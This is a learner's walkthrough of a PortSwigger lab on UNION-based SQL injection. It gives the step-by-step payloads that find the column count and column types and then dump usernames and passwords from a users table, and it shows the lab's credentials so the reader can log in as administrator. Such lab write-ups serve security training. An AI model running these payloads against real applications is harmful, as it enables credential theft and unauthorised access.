This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you need to combine some of the techniques you learned in previous labs.

The database contains a different table called `users`, with columns called `username` and `password`.

To solve the lab, perform an [SQL injection UNION](https://portswigger.net/web-security/sql-injection/union-attacks) attack that retrieves all usernames and passwords, and use the information to log in as the `administrator` user.

# Practical
Again, always remember to check out how the application functions by checking the site and clicking around. 
This time we only have category and there's no product clickable.
```html
https://ac1f1f7e1fe7b2f080640a2200ec0046.web-security-academy.net/filter?category=Tech+gifts
```
Now let's determine if the application is vulnerable to SQL injection.
```html
https://ac1f1f7e1fe7b2f080640a2200ec0046.web-security-academy.net/filter?category='
```
And we get an Internal Server Error.
Again we are performing an UNION attack so first order of business is to determine the number of columns.

We'll be doing the two methods ORDER BY and UNION SELECT NULL

First, let's do ORDER BY 1-- and increment it 1 by 1 to see if it breaks the app or not.
```sql
ORDER BY 3--
```
The app breaks when we reach 3, so it's possible that we only have 2 columns.
Let's do the second method.
```sql
' UNION SELECT NULL,NULL,NULL--
```
And again the site breaks at 3 and is fine at 2 NULLs, so we successfully determined the number of columns. 

Now we need to determine the data type. We are more interested in strings datatype since usually hashes,passwords, and username are stored in strings.
Do this simply replace a string or letter in a NULL position.
```sql
` UNION SELECT 'a',NULL--
```
The site didn't return an error. So the first column is a string datatype. Let's try the second one.
```sql
' UNION SELECT 'a','b'--
```
And again no error, so both of the columns are strings. Let's view what the challenge wants again.
```txt
retrieves all usernames and passwords, and use the information to log in as the `administrator` user.
```
And we have this information
```txt
The database contains a different table called `users`, with columns called `username` and `password`.
```
So let's start crafting our payload
```sql
' UNION SELECT username,password FROM users--
```
This will output every username and password from the users table.
Let's try it.
```txt
administrator.weyxvxji6wfpg919ooz2

carlos.regzoyy3d1v4wqjiiau4

wiener.wh27zk2ps6qox3w4nwi3

```
Let's login as administrator to solve the lab.
